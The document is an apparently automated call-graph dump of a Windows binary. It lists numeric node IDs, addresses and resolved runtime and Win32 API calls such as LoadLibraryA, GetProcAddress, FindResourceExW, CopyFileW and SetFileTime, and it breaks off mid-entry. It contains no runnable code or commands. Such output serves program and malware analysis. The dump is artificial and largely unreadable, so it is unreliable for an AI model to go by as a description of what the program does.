94486 2ccc5c 86 API calls 4 library calls 93467->94486 93468 2f909a 93470 28d645 53 API calls 93468->93470 93511 2f91fa 93468->93511 93469 28fe30 331 API calls 93472 2f9407 93469->93472 93473 2f910c 93470->93473 93472->93521 94491 28d6e9 93472->94491 93476 2f9114 93473->93476 93477 2f9220 93473->93477 93474 2933ce 93479 2f945e 93474->93479 93480 293465 93474->93480 93474->93500 93489 2f9128 93476->93489 93499 2f9152 93476->93499 94483 281caa 49 API calls 93477->94483 94496 2cc942 50 API calls 93479->94496 93485 29f4ea 48 API calls 93480->93485 93503 29346c 93485->93503 93486 2f9438 94495 2ccc5c 86 API calls 4 library calls 93486->94495 93487 2f923d 93492 2f925e 93487->93492 93493 2f9252 93487->93493 93488 28fe30 331 API calls 93488->93500 94478 2ccc5c 86 API calls 4 library calls 93489->94478 93491 29c3c3 48 API calls 93491->93500 94485 2ccc5c 86 API calls 4 library calls 93492->94485 94484 2ccc5c 86 API calls 4 library calls 93493->94484 93495 29351f 93512 286eed 48 API calls 93495->93512 93514 293540 93495->93514 93501 2f9177 93499->93501 93505 2f9195 93499->93505 93500->93467 93500->93468 93500->93486 93500->93488 93500->93491 93500->93495 93509 29f4ea 48 API calls 93500->93509 93513 2f9394 93500->93513 93517 2f93c5 93500->93517 93500->93521 94473 28d9a0 53 API calls __cinit 93500->94473 94474 28d8c0 53 API calls 93500->94474 94475 29c2d6 48 API calls ___crtGetEnvironmentStringsW 93500->94475 94487 2dcda2 82 API calls Mailbox 93500->94487 94488 2c80e3 53 API calls 93500->94488 94489 28d764 55 API calls 93500->94489 94490 28dcae 50 API calls Mailbox 93500->94490 94479 2df320 331 API calls 93501->94479 93503->93495 94410 28e8d0 93503->94410 93507 2f918b 93505->93507 94480 2df5ee 331 API calls 93505->94480 93507->93521 94481 29c2d6 48 API calls ___crtGetEnvironmentStringsW 93507->94481 93509->93500 94482 2ccc5c 86 API calls 4 library calls 93511->94482 93512->93514 93515 29f4ea 48 API calls 93513->93515 93518 2f94b0 93514->93518 93520 293585 93514->93520 93514->93521 93515->93517 93517->93469 94497 28dcae 50 API calls Mailbox 93518->94497 93520->93461 93520->93521 93522 293615 93520->93522 93524 293635 Mailbox 93521->93524 94476 2ccc5c 86 API calls 4 library calls 93521->94476 94472 28dcae 50 API calls Mailbox 93522->94472 93524->93112 93525->93122 93526->93124 93527->93128 93529 2cfa1c __ftell_nolock 93528->93529 93530 2cfa44 93529->93530 93672 28d286 48 API calls 93529->93672 93532 28936c 81 API calls 93530->93532 93533 2cfa5e 93532->93533 93534 2cfb68 93533->93534 93535 2cfa80 93533->93535 93544 2cfb92 93533->93544 93589 2841a9 93534->93589 93537 28936c 81 API calls 93535->93537 93542 2cfa8c _wcscpy _wcschr 93537->93542 93539 2cfb8e 93541 28936c 81 API calls 93539->93541 93539->93544 93540 2841a9 136 API calls 93540->93539 93543 2cfbc7 93541->93543 93548 2cfab0 _wcscat _wcscpy 93542->93548 93552 2cfade _wcscat 93542->93552 93613 2a1dfc 93543->93613 93544->93443 93546 28936c 81 API calls 93547 2cfafc _wcscpy 93546->93547 93673 2c72cb GetFileAttributesW 93547->93673 93550 28936c 81 API calls 93548->93550 93550->93552 93551 2cfbeb _wcscat _wcscpy 93557 28936c 81 API calls 93551->93557 93552->93546 93553 2cfb1c __NMSG_WRITE 93553->93544 93554 28936c 81 API calls 93553->93554 93555 2cfb48 93554->93555 93674 2c60dd 77 API calls 4 library calls 93555->93674 93558 2cfc82 93557->93558 93616 2c690b 93558->93616 93559 2cfb5c 93559->93544 93561 2cfca2 93562 2c6524 3 API calls 93561->93562 93563 2cfcb1 93562->93563 93564 28936c 81 API calls 93563->93564 93566 2cfce2 93563->93566 93565 2cfccb 93564->93565 93622 2cbfa4 93565->93622 93568 284252 84 API calls 93566->93568 93568->93544 93570 28425c 93569->93570 93571 284263 93569->93571 93572 2a35e4 __fcloseall 83 API calls 93570->93572 93573 284272 93571->93573 93574 284283 FreeLibrary 93571->93574 93572->93571 93573->93443 93574->93573 93576 28936c 81 API calls 93575->93576 93577 2d702a 93576->93577 94345 28b470 93577->94345 93579 2d703a 93580 2d705f 93579->93580 93581 28fe30 331 API calls 93579->93581 93583 2d7063 93580->93583 94373 28cdb9 48 API calls 93580->94373 93581->93580 93583->93443 94394 2c6ca9 GetFileAttributesW 93584->94394 93587->93445 93588->93443 93675 284214 93589->93675 93594 2f4f73 93596 284252 84 API calls 93594->93596 93595 2841d4 LoadLibraryExW 93685 284291 93595->93685 93598 2f4f7a 93596->93598 93600 284291 3 API calls 93598->93600 93602 2f4f82 93600->93602 93711 2844ed 93602->93711 93603 2841fb 93603->93602 93604 284207 93603->93604 93606 284252 84 API calls 93604->93606 93607 28420c 93606->93607 93607->93539 93607->93540 93610 2f4fa9 93717 284950 93610->93717 94017 2a1e46 93613->94017 93617 2c6918 _wcschr __ftell_nolock 93616->93617 93618 2a1dfc __wsplitpath 47 API calls 93617->93618 93621 2c692e _wcscat _wcscpy 93617->93621 93619 2c695d 93618->93619 93620 2a1dfc __wsplitpath 47 API calls 93619->93620 93620->93621 93621->93561 93623 2cbfb1 __ftell_nolock 93622->93623 93624 29f4ea 48 API calls 93623->93624 93625 2cc00e 93624->93625 93626 2847b7 48 API calls 93625->93626 93627 2cc018 93626->93627 94043 2cbdb4 93627->94043 93629 2cc023 93630 284517 83 API calls 93629->93630 93631 2cc036 _wcscmp 93630->93631 93632 2cc05a 93631->93632 93633 2cc107 93631->93633 94076 2cc56d 94 API calls 2 library calls 93632->94076 94077 2cc56d 94 API calls 2 library calls 93633->94077 93636 2cc05f 93637 2a1dfc __wsplitpath 47 API calls 93636->93637 93640 2cc110 93636->93640 93642 2cc088 _wcscat _wcscpy 93637->93642 93638 2844ed 64 API calls 93639 2cc12c 93638->93639 93641 2844ed 64 API calls 93639->93641 93640->93566 93643 2cc13c 93641->93643 93645 2a1dfc __wsplitpath 47 API calls 93642->93645 93644 2844ed 64 API calls 93643->93644 93646 2cc157 93644->93646 93650 2cc0d3 _wcscat 93645->93650 93647 2844ed 64 API calls 93646->93647 93648 2cc167 93647->93648 93649 2844ed 64 API calls 93648->93649 93651 2cc182 93649->93651 93650->93638 93650->93640 93652 2844ed 64 API calls 93651->93652 93653 2cc192 93652->93653 93654 2844ed 64 API calls 93653->93654 93655 2cc1a2 93654->93655 93656 2844ed 64 API calls 93655->93656 93657 2cc1b2 93656->93657 94046 2cc71a GetTempPathW GetTempFileNameW 93657->94046 93659 2cc1be 93660 2a3499 117 API calls 93659->93660 93667 2cc1cf 93660->93667 93661 2cc289 94060 2a35e4 93661->94060 93663 2cc294 93663->93640 93665 2cc342 CopyFileW 93663->93665 93668 2cc2b8 93663->93668 93664 2844ed 64 API calls 93664->93667 93665->93640 93666 2cc32d 93665->93666 93666->93640 94073 2cc6d9 CreateFileW 93666->94073 93667->93640 93667->93661 93667->93664 94047 2a2aae 93667->94047 94078 2cb965 118 API calls __fcloseall 93668->94078 93672->93530 93673->93553 93674->93559 93722 284339 93675->93722 93679 2841bb 93682 2a3499 93679->93682 93680 284244 FreeLibrary 93680->93679 93681 28423c 93681->93679 93681->93680 93730 2a34ae 93682->93730 93684 2841c8 93684->93594 93684->93595 93933 2842e4 93685->93933 93689 2841ec 93692 284380 93689->93692 93690 2842c1 FreeLibrary 93690->93689 93691 2842b8 93691->93689 93691->93690 93693 29f4ea 48 API calls 93692->93693 93694 284395 93693->93694 93941 2847b7 93694->93941 93696 2843a1 ___crtGetEnvironmentStringsW 93697 2843dc 93696->93697 93698 284499 93696->93698 93699 2844d1 93696->93699 93700 284950 57 API calls 93697->93700 93944 28406b CreateStreamOnHGlobal 93698->93944 93955 2cc750 93 API calls 93699->93955 93704 2843e5 93700->93704 93703 2844ed 64 API calls 93703->93704 93704->93703 93705 284479 93704->93705 93707 2f4ed7 93704->93707 93950 284517 93704->93950 93705->93603 93708 284517 83 API calls 93707->93708 93709 2f4eeb 93708->93709 93710 2844ed 64 API calls 93709->93710 93710->93705 93712 2844ff 93711->93712 93713 2f4fc0 93711->93713 93979 2a381e 93712->93979 93716 2cbf5a GetSystemTimeAsFileTime 93716->93610 93718 28495f 93717->93718 93719 2f5002 93717->93719 93999 2a3e65 93718->93999 93721 284967 93726 28434b 93722->93726 93725 284321 LoadLibraryA GetProcAddress 93725->93681 93727 28422f 93726->93727 93728 284354 LoadLibraryA 93726->93728 93727->93681 93727->93725 93728->93727 93729 284365 GetProcAddress 93728->93729 93729->93727 93732 2a34ba __getstream 93730->93732 93731 2a34cd 93778 2a7c0e 47 API calls __getptd_noexit 93731->93778 93732->93731 93734 2a34fe 93732->93734 93749 2ae4c8 93734->93749 93735 2a34d2 93779 2a6e10 8 API calls __cftoe2_l 93735->93779 93738 2a3503 93739 2a3519 93738->93739 93740 2a350c 93738->93740 93742 2a3543 93739->93742 93743 2a3523 93739->93743 93780 2a7c0e 47 API calls __getptd_noexit 93740->93780 93763 2ae5e0 93742->93763 93781 2a7c0e 47 API calls __getptd_noexit 93743->93781 93745 2a34dd @_EH4_CallFilterFunc@8 __getstream 93745->93684 93750 2ae4d4 __getstream 93749->93750 93783 2a7cf4 93750->93783 93752 2ae559 93819 2a69d0 47 API calls _W_store_winword 93752->93819 93755 2ae5cc __getstream 93755->93738 93756 2ae560 93757 2ae56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93756->93757 93761 2ae552 93756->93761 93757->93761 93760 2ae4e2 93760->93752 93760->93761 93793 2a7d7c 93760->93793 93817 2a4e5b 48 API calls __lock 93760->93817 93818 2a4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93760->93818 93790 2ae5d7 93761->93790 93771 2ae600 __wopenfile 93763->93771 93764 2ae61a 93838 2a7c0e 47 API calls __getptd_noexit 93764->93838 93766 2ae61f 93839 2a6e10 8 API calls __cftoe2_l 93766->93839 93768 2a354e 93782 2a3570 LeaveCriticalSection LeaveCriticalSection _fseek 93768->93782 93769 2ae838 93835 2b63c9 93769->93835 93771->93764 93771->93771 93777 2ae7d5 93771->93777 93840 2a185b 59 API calls 3 library calls 93771->93840 93773 2ae7ce 93773->93777 93841 2a185b 59 API calls 3 library calls 93773->93841 93775 2ae7ed 93775->93777 93842 2a185b 59 API calls 3 library calls 93775->93842 93777->93764 93777->93769 93778->93735 93779->93745 93780->93745 93781->93745 93782->93745 93784 2a7d18 EnterCriticalSection 93783->93784 93785 2a7d05 93783->93785 93784->93760 93786 2a7d7c __mtinitlocknum 46 API calls 93785->93786 93787 2a7d0b 93786->93787 93787->93784 93820 2a115b 47 API calls 3 library calls 93787->93820 93821 2a7e58 LeaveCriticalSection 93790->93821 93792 2ae5de 93792->93755 93794 2a7d88 __getstream 93793->93794 93795 2a7da9 93794->93795 93796 2a7d91 93794->93796 93798 2a7da7 93795->93798 93804 2a7e11 __getstream 93795->93804 93822 2a81c2 47 API calls __NMSG_WRITE 93796->93822 93798->93795 93825 2a69d0 47 API calls _W_store_winword 93798->93825 93799 2a7d96 93823 2a821f 47 API calls 5 library calls 93799->93823 93802 2a7dbd 93805 2a7dd3 93802->93805 93806 2a7dc4 93802->93806 93803 2a7d9d 93824 2a1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93803->93824 93804->93760 93808 2a7cf4 __lock 46 API calls 93805->93808 93826 2a7c0e 47 API calls __getptd_noexit 93806->93826 93811 2a7dda 93808->93811 93810 2a7dc9 93810->93804 93812 2a7de9 InitializeCriticalSectionAndSpinCount 93811->93812 93813 2a7dfe 93811->93813 93814 2a7e04 93812->93814 93827 2a1c9d 93813->93827 93833 2a7e1a LeaveCriticalSection _doexit 93814->93833 93817->93760 93818->93760 93819->93756 93821->93792 93822->93799 93823->93803 93825->93802 93826->93810 93828 2a1ccf _free 93827->93828 93829 2a1ca6 RtlFreeHeap 93827->93829 93828->93814 93829->93828 93830 2a1cbb 93829->93830 93834 2a7c0e 47 API calls __getptd_noexit 93830->93834 93832 2a1cc1 GetLastError 93832->93828 93833->93804 93834->93832 93843 2b5bb1 93835->93843 93837 2b63e2 93837->93768 93838->93766 93839->93768 93840->93773 93841->93775 93842->93777 93844 2b5bbd __getstream 93843->93844 93845 2b5bcf 93844->93845 93848 2b5c06 93844->93848 93930 2a7c0e 47 API calls __getptd_noexit 93845->93930 93847 2b5bd4 93931 2a6e10 8 API calls __cftoe2_l 93847->93931 93854 2b5c78 93848->93854 93851 2b5c23 93932 2b5c4c LeaveCriticalSection __unlock_fhandle 93851->93932 93853 2b5bde __getstream 93853->93837 93855 2b5c98 93854->93855 93856 2a273b __wsopen_helper 47 API calls 93855->93856 93859 2b5cb4 93856->93859 93857 2b5deb 93858 2a6e20 __invoke_watson 8 API calls 93857->93858 93860 2b63c8 93858->93860 93859->93857 93861 2b5cee 93859->93861 93869 2b5d11 93859->93869 93862 2b5bb1 __wsopen_helper 104 API calls 93860->93862 93863 2a7bda __chsize_nolock 47 API calls 93861->93863 93864 2b63e2 93862->93864 93865 2b5cf3 93863->93865 93864->93851 93866 2a7c0e __recalloc 47 API calls 93865->93866 93867 2b5d00 93866->93867 93870 2a6e10 __cftoe2_l 8 API calls 93867->93870 93868 2b5dcf 93871 2a7bda __chsize_nolock 47 API calls 93868->93871 93869->93868 93877 2b5dad 93869->93877 93872 2b5d0a 93870->93872 93873 2b5dd4 93871->93873 93872->93851 93874 2a7c0e __recalloc 47 API calls 93873->93874 93875 2b5de1 93874->93875 93876 2a6e10 __cftoe2_l 8 API calls 93875->93876 93876->93857 93878 2aa979 __wsopen_helper 52 API calls 93877->93878 93879 2b5e7b 93878->93879 93880 2b5ea6 93879->93880 93881 2b5e85 93879->93881 93883 2b5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 93880->93883 93882 2a7bda __chsize_nolock 47 API calls 93881->93882 93884 2b5e8a 93882->93884 93894 2b5ec8 93883->93894 93885 2a7c0e __recalloc 47 API calls 93884->93885 93887 2b5e94 93885->93887 93886 2b5f46 GetFileType 93888 2b5f93 93886->93888 93889 2b5f51 GetLastError 93886->93889 93892 2a7c0e __recalloc 47 API calls 93887->93892 93899 2aac0b __set_osfhnd 48 API calls 93888->93899 93893 2a7bed __dosmaperr 47 API calls 93889->93893 93890 2b5f14 GetLastError 93891 2a7bed __dosmaperr 47 API calls 93890->93891 93896 2b5f39 93891->93896 93892->93872 93897 2b5f78 CloseHandle 93893->93897 93894->93886 93894->93890 93895 2b5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 93894->93895 93898 2b5f09 93895->93898 93901 2a7c0e __recalloc 47 API calls 93896->93901 93897->93896 93900 2b5f86 93897->93900 93898->93886 93898->93890 93904 2b5fb1 93899->93904 93902 2a7c0e __recalloc 47 API calls 93900->93902 93901->93857 93903 2b5f8b 93902->93903 93903->93896 93905 2b616c 93904->93905 93906 2af82f __lseeki64_nolock 49 API calls 93904->93906 93920 2b6032 93904->93920 93905->93857 93907 2b633f CloseHandle 93905->93907 93908 2b601b 93906->93908 93909 2b5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 93907->93909 93912 2a7bda __chsize_nolock 47 API calls 93908->93912 93926 2b603a 93908->93926 93911 2b6366 93909->93911 93910 2aee0e 59 API calls __filbuf 93910->93926 93913 2b636e GetLastError 93911->93913 93929 2b61f6 93911->93929 93912->93920 93914 2a7bed __dosmaperr 47 API calls 93913->93914 93915 2b637a 93914->93915 93918 2aab1e __free_osfhnd 48 API calls 93915->93918 93916 2aea9c __close_nolock 50 API calls 93916->93926 93917 2b6f40 __chsize_nolock 81 API calls 93917->93926 93918->93929 93919 2aaf61 __flush 78 API calls 93919->93920 93920->93905 93920->93919 93923 2af82f 49 API calls __lseeki64_nolock 93920->93923 93920->93926 93921 2b61e9 93924 2aea9c __close_nolock 50 API calls 93921->93924 93922 2b61d2 93922->93905 93923->93920 93925 2b61f0 93924->93925 93928 2a7c0e __recalloc 47 API calls 93925->93928 93926->93910 93926->93916 93926->93917 93926->93920 93926->93921 93926->93922 93927 2af82f 49 API calls __lseeki64_nolock 93926->93927 93927->93926 93928->93929 93929->93857 93930->93847 93931->93853 93932->93853 93937 2842f6 93933->93937 93936 2842cc LoadLibraryA GetProcAddress 93936->93691 93938 2842aa 93937->93938 93939 2842ff LoadLibraryA 93937->93939 93938->93691 93938->93936 93939->93938 93940 284310 GetProcAddress 93939->93940 93940->93938 93942 29f4ea 48 API calls 93941->93942 93943 2847c9 93942->93943 93943->93696 93945 284085 FindResourceExW 93944->93945 93947 2840a2 93944->93947 93946 2f4f16 LoadResource 93945->93946 93945->93947 93946->93947 93948 2f4f2b SizeofResource 93946->93948 93947->93697 93948->93947 93949 2f4f3f LockResource 93948->93949 93949->93947 93951 284526 93950->93951 93952 2f4fe0 93950->93952 93956 2a3a8d 93951->93956 93954 284534 93954->93704 93955->93697 93957 2a3a99 __getstream 93956->93957 93958 2a3aa7 93957->93958 93960 2a3acd 93957->93960 93969 2a7c0e 47 API calls __getptd_noexit 93958->93969 93971 2a4e1c 93960->93971 93961 2a3aac 93970 2a6e10 8 API calls __cftoe2_l 93961->93970 93966 2a3ae2 93978 2a3b04 LeaveCriticalSection LeaveCriticalSection _fseek 93966->93978 93968 2a3ab7 __getstream 93968->93954 93969->93961 93970->93968 93972 2a4e4e EnterCriticalSection 93971->93972 93973 2a4e2c 93971->93973 93976 2a3ad3 93972->93976 93973->93972 93974 2a4e34 93973->93974 93975 2a7cf4 __lock 47 API calls 93974->93975 93975->93976 93977 2a39fe 81 API calls 4 library calls 93976->93977 93977->93966 93978->93968 93982 2a3839 93979->93982 93981 284510 93981->93716 93983 2a3845 __getstream 93982->93983 93984 2a385b _memset 93983->93984 93985 2a3888 93983->93985 93986 2a3880 __getstream 93983->93986 93995 2a7c0e 47 API calls __getptd_noexit 93984->93995 93987 2a4e1c __lock_file 48 API calls 93985->93987 93986->93981 93988 2a388e 93987->93988 93997 2a365b 62 API calls 6 library calls 93988->93997 93991 2a3875 93996 2a6e10 8 API calls __cftoe2_l 93991->93996 93992 2a38a4 93998 2a38c2 LeaveCriticalSection LeaveCriticalSection _fseek 93992->93998 93995->93991 93996->93986 93997->93992 93998->93986 94000 2a3e71 __getstream 93999->94000 94001 2a3e7f 94000->94001 94002 2a3e94 94000->94002 94013 2a7c0e 47 API calls __getptd_noexit 94001->94013 94004 2a4e1c __lock_file 48 API calls 94002->94004 94006 2a3e9a 94004->94006 94005 2a3e84 94014 2a6e10 8 API calls __cftoe2_l 94005->94014 94015 2a3b0c 55 API calls 5 library calls 94006->94015 94009 2a3ea5 94016 2a3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94009->94016 94011 2a3eb7 94012 2a3e8f __getstream 94011->94012 94012->93721 94013->94005 94014->94012 94015->94009 94016->94011 94018 2a1e61 94017->94018 94021 2a1e55 94017->94021 94041 2a7c0e 47 API calls __getptd_noexit 94018->94041 94020 2a2019 94025 2a1e41 94020->94025 94042 2a6e10 8 API calls __cftoe2_l 94020->94042 94021->94018 94027 2a1ed4 94021->94027 94036 2a9d6b 47 API calls 2 library calls 94021->94036 94024 2a1fa0 94024->94018 94024->94025 94028 2a1fb0 94024->94028 94025->93551 94026 2a1f5f 94026->94018 94029 2a1f7b 94026->94029 94038 2a9d6b 47 API calls 2 library calls 94026->94038 94027->94018 94035 2a1f41 94027->94035 94037 2a9d6b 47 API calls 2 library calls 94027->94037 94040 2a9d6b 47 API calls 2 library calls 94028->94040 94029->94018 94029->94025 94031 2a1f91 94029->94031 94039 2a9d6b 47 API calls 2 library calls 94031->94039 94035->94024 94035->94026 94036->94027 94037->94035 94038->94029 94039->94025 94040->94025 94041->94020 94042->94025 94079 2a344a GetSystemTimeAsFileTime 94043->94079 94045 2cbdc3 94045->93629 94046->93659 94048 2a2aba __getstream 94047->94048 94049 2a2aec 94048->94049 94050 2a2ad4 94048->94050 94051 2a2ae4 __getstream 94048->94051 94052 2a4e1c __lock_file 48 API calls 94049->94052 94093 2a7c0e 47 API calls __getptd_noexit 94050->94093 94051->93667 94054 2a2af2 94052->94054 94081 2a2957 94054->94081 94055 2a2ad9 94094 2a6e10 8 API calls __cftoe2_l 94055->94094 94061 2a35f0 __getstream 94060->94061 94062 2a361c 94061->94062 94063 2a3604 94061->94063 94065 2a4e1c __lock_file 48 API calls 94062->94065 94068 2a3614 __getstream 94062->94068 94271 2a7c0e 47 API calls __getptd_noexit 94063->94271 94069 2a362e 94065->94069 94066 2a3609 94272 2a6e10 8 API calls __cftoe2_l 94066->94272 94068->93663 94255 2a3578 94069->94255 94074 2cc6ff SetFileTime CloseHandle 94073->94074 94075 2cc715 94073->94075 94074->94075 94075->93640 94076->93636 94077->93650 94078->93666 94080 2a3478 __aulldiv 94079->94080 94080->94045 94083 2a2966 94081->94083 94088 2a2984 94081->94088 94082 2a2974 94128 2a7c0e 47 API calls __getptd_noexit 94082->94128 94083->94082 94083->94088 94091 2a299c ___crtGetEnvironmentStringsW 94083->94091 94085 2a2979 94129 2a6e10 8 API calls __cftoe2_l 94085->94129 94095 2a2b24 LeaveCriticalSection LeaveCriticalSection _fseek 94088->94095 94091->94088 94096 2a2933 94091->94096 94103 2aaf61 94091->94103 94130 2a2c84 94091->94130 94136 2a8e63 78 API calls 5 library calls 94091->94136 94093->94055 94094->94051 94095->94051 94097 2a293d 94096->94097 94098 2a2952 94096->94098 94137 2a7c0e 47 API calls __getptd_noexit 94097->94137 94098->94091 94100 2a2942 94138 2a6e10 8 API calls __cftoe2_l 94100->94138 94102 2a294d 94102->94091 94104 2aaf6d __getstream 94103->94104 94105 2aaf8d 94104->94105 94106 2aaf75 94104->94106 94107 2ab022 94105->94107 94113 2aafbf 94105->94113 94212 2a7bda 47 API calls __getptd_noexit 94106->94212 94217 2a7bda 47 API calls __getptd_noexit 94107->94217 94110 2aaf7a 94213 2a7c0e 47 API calls __getptd_noexit 94110->94213 94112 2ab027 94218 2a7c0e 47 API calls __getptd_noexit 94112->94218 94139 2aa8ed 94113->94139 94114 2aaf82 __getstream 94114->94091 94117 2ab02f 94219 2a6e10 8 API calls __cftoe2_l 94117->94219 94118 2aafc5 94120 2aafeb 94118->94120 94121 2aafd8 94118->94121 94214 2a7c0e 47 API calls __getptd_noexit 94120->94214 94148 2ab043 94121->94148 94124 2aafe4 94216 2ab01a LeaveCriticalSection __unlock_fhandle 94124->94216 94125 2aaff0 94215 2a7bda 47 API calls __getptd_noexit 94125->94215 94128->94085 94129->94088 94131 2a2c97 94130->94131 94132 2a2cbb 94130->94132 94131->94132 94133 2a2933 __stbuf 47 API calls 94131->94133 94132->94091 94134 2a2cb4 94133->94134 94135 2aaf61 __flush 78 API calls 94134->94135 94135->94132 94136->94091 94137->94100 94138->94102 94140 2aa8f9 __getstream 94139->94140 94141 2aa946 EnterCriticalSection 94140->94141 94143 2a7cf4 __lock 47 API calls 94140->94143 94142 2aa96c __getstream 94141->94142 94142->94118 94144 2aa91d 94143->94144 94145 2aa93a 94144->94145 94146 2aa928 InitializeCriticalSectionAndSpinCount 94144->94146 94220 2aa970 LeaveCriticalSection _doexit 94145->94220 94146->94145 94149 2ab050 __ftell_nolock 94148->94149 94150 2ab0ac 94149->94150 94151 2ab08d 94149->94151 94180 2ab082 94149->94180 94154 2ab105 94150->94154 94155 2ab0e9 94150->94155 94230 2a7bda 47 API calls __getptd_noexit 94151->94230 94159 2ab11c 94154->94159 94236 2af82f 49 API calls 3 library calls 94154->94236 94233 2a7bda 47 API calls __getptd_noexit 94155->94233 94156 2ab86b 94156->94124 94157 2ab092 94231 2a7c0e 47 API calls __getptd_noexit 94157->94231 94221 2b3bf2 94159->94221 94161 2ab0ee 94234 2a7c0e 47 API calls __getptd_noexit 94161->94234 94163 2ab099 94232 2a6e10 8 API calls __cftoe2_l 94163->94232 94169 2ab0f5 94244 2aa70c 94180->94244 94212->94110 94213->94114 94214->94125 94215->94124 94216->94114 94217->94112 94218->94117 94219->94114 94220->94141 94222 2b3bfd 94221->94222 94224 2b3c0a 94221->94224 94226 2b3c16 94224->94226 94252 2a7c0e 47 API calls __getptd_noexit 94224->94252 94230->94157 94231->94163 94232->94180 94233->94161 94234->94169 94236->94159 94245 2aa716 IsProcessorFeaturePresent 94244->94245 94246 2aa714 94244->94246 94248 2b37b0 94245->94248 94246->94156 94254 2b375f 5 API calls 2 library calls 94248->94254 94250 2b3893 94250->94156 94254->94250 94256 2a359b 94255->94256 94257 2a3587 94255->94257 94259 2a3597 94256->94259 94261 2a2c84 __flush 78 API calls 94256->94261 94301 2a7c0e 47 API calls __getptd_noexit 94257->94301 94273 2a3653 LeaveCriticalSection LeaveCriticalSection _fseek 94259->94273 94260 2a358c 94302 2a6e10 8 API calls __cftoe2_l 94260->94302 94263 2a35a7 94261->94263 94274 2aeb36 94263->94274 94266 2a2933 __stbuf 47 API calls 94267 2a35b5 94266->94267 94278 2ae9d2 94267->94278 94269 2a35bb 94269->94259 94270 2a1c9d _free 47 API calls 94269->94270 94270->94259 94271->94066 94272->94068 94273->94068 94275 2a35af 94274->94275 94276 2aeb43 94274->94276 94275->94266 94276->94275 94277 2a1c9d _free 47 API calls 94276->94277 94277->94275 94279 2ae9de __getstream 94278->94279 94280 2ae9fe 94279->94280 94281 2ae9e6 94279->94281 94282 2aea7b 94280->94282 94288 2aea28 94280->94288 94318 2a7bda 47 API calls __getptd_noexit 94281->94318 94322 2a7bda 47 API calls __getptd_noexit 94282->94322 94285 2ae9eb 94319 2a7c0e 47 API calls __getptd_noexit 94285->94319 94287 2aea80 94323 2a7c0e 47 API calls __getptd_noexit 94287->94323 94290 2aa8ed ___lock_fhandle 49 API calls 94288->94290 94292 2aea2e 94290->94292 94291 2aea88 94324 2a6e10 8 API calls __cftoe2_l 94291->94324 94294 2aea4c 94292->94294 94295 2aea41 94292->94295 94320 2a7c0e 47 API calls __getptd_noexit 94294->94320 94303 2aea9c 94295->94303 94296 2ae9f3 __getstream 94296->94269 94299 2aea47 94321 2aea73 LeaveCriticalSection __unlock_fhandle 94299->94321 94301->94260 94302->94259 94325 2aaba4 94303->94325 94307 2aeaaa 94318->94285 94319->94296 94320->94299 94321->94296 94322->94287 94323->94291 94324->94296 94326 2aabaf 94325->94326 94327 2aabc4 94325->94327 94340 2a7bda 47 API calls __getptd_noexit 94326->94340 94331 2aabe9 94327->94331 94342 2a7bda 47 API calls __getptd_noexit 94327->94342 94330 2aabb4 94331->94307 94332 2aabf3 94340->94330 94342->94332 94374 286b0f 94345->94374 94347 28b69b 94381 28ba85 94347->94381 94349 28b6b5 Mailbox 94349->93579 94352 2f3939 ___crtGetEnvironmentStringsW 94391 2c26bc 88 API calls 4 library calls 94352->94391 94353 2f397b 94392 2c26bc 88 API calls 4 library calls 94353->94392 94354 28ba85 48 API calls 94365 28b495 94354->94365 94357 28b9e4 94393 2c26bc 88 API calls 4 library calls 94357->94393 94358 2f3973 94358->94349 94361 28bcce 48 API calls 94361->94365 94362 2f3989 94363 28ba85 48 API calls 94362->94363 94363->94358 94364 2f3909 94367 286b4a 48 API calls 94364->94367 94365->94347 94365->94352 94365->94353 94365->94354 94365->94357 94365->94361 94365->94364 94366 28bb85 48 API calls 94365->94366 94370 28bdfa 48 API calls 94365->94370 94379 28c413 59 API calls 94365->94379 94380 28bc74 48 API calls 94365->94380 94389 28c6a5 49 API calls 94365->94389 94390 28c799 48 API calls ___crtGetEnvironmentStringsW 94365->94390 94366->94365 94369 2f3914 94367->94369 94372 29f4ea 48 API calls 94369->94372 94371 28b66c CharUpperBuffW 94370->94371 94371->94365 94372->94352 94373->93583 94375 29f4ea 48 API calls 94374->94375 94376 286b34 94375->94376 94377 286b4a 48 API calls 94376->94377 94378 286b43 94377->94378 94378->94365 94379->94365 94380->94365 94382 28bb25 94381->94382 94385 28ba98 ___crtGetEnvironmentStringsW 94381->94385 94384 29f4ea 48 API calls 94382->94384 94383 29f4ea 48 API calls 94386 28ba9f 94383->94386 94384->94385 94385->94383 94387 29f4ea 48 API calls 94386->94387 94388 28bac8 94386->94388 94387->94388 94388->94349 94389->94365 94390->94365 94391->94358 94392->94362 94393->94358 94395 2c6529 94394->94395 94396 2c6cc4 FindFirstFileW 94394->94396 94395->93443 94396->94395 94397 2c6cd9 FindClose 94396->94397 94397->94395 94399 28bd3f 94398->94399 94402 28bd5a 94398->94402 94400 28bdfa 48 API calls 94399->94400 94401 28bd47 CharUpperBuffW 94400->94401 94401->94402 94402->93455 94404 282b8b 94403->94404 94405 2f436a 94403->94405 94406 29f4ea 48 API calls 94404->94406 94407 282b92 94406->94407 94408 282bb3 94407->94408 94499 282bce 48 API calls 94407->94499 94408->93474 94411 28e8f6 94410->94411 94470 28e902 Mailbox 94410->94470 94412 28ed52 94411->94412 94411->94470 94581 29e3cd 331 API calls 94412->94581 94414 28ebc7 94415 28ebdd 94414->94415 94582 282ff6 16 API calls 94414->94582 94415->93500 94417 28ed63 94417->94415 94419 28ed70 94417->94419 94418 28e94c PeekMessageW 94418->94470 94583 29e312 331 API calls Mailbox 94419->94583 94420 2f526e Sleep 94420->94470 94422 28ed77 LockWindowUpdate DestroyWindow GetMessageW 94422->94415 94425 28eda9 94422->94425 94426 2f59ef TranslateMessage DispatchMessageW GetMessageW 94425->94426 94426->94426 94427 2f5a1f 94426->94427 94427->94415 94428 28ebf7 timeGetTime 94428->94470 94429 28ed21 PeekMessageW 94429->94470 94430 286eed 48 API calls 94430->94470 94432 29f4ea 48 API calls 94432->94470 94433 2f5557 WaitForSingleObject 94437 2f5574 GetExitCodeProcess CloseHandle 94433->94437 94433->94470 94434 2f588f Sleep 94465 2f5429 Mailbox 94434->94465 94435 28ed3a TranslateMessage DispatchMessageW 94435->94429 94436 28d7f7 48 API calls 94436->94465 94437->94470 94438 